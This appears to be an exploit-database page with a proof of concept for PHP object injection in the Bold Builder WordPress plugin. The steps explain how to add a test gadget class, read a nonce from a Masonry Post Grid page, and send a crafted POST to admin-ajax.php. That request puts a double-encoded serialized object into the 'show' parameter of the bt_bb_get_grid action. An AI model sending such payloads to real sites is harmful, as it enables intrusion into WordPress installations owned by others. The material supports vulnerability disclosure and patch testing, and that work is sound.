Share
## https://sploitus.com/exploit?id=WPEX-ID:08EDCE3F-2746-4886-8439-76E44EC76FA8
1. (This is to simulate a vulnerable Gadget chain for the Object Injection). Insert the following class inside bold-builder.php

class INJECTED_CLASS {
public function __destruct(){
echo "OBJECT INJECTED";die();
}
}

2. Get the nonce from a page with a Masonry Post Grid in (to create that: add/edit a post, switch editor to Bold Builder, and add the Masonry Post Grid inside a column)
    The nonce is in the data-bt-bb-masonry-post-grid-nonce attribute


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 245
Connection: close

action=bt_bb_get_grid&number=1000&category&show=a%253A2%253A%257Bi%253A1%253BO%253A14%253A%2522INJECTED_CLASS%2522%253A0%253A%257B%257Di%253A1%253Bs%253A1%253A%2522a%2522%253B%257D&bt-bb-masonry-post-grid-nonce=<nonce>&post-type=post&offset=0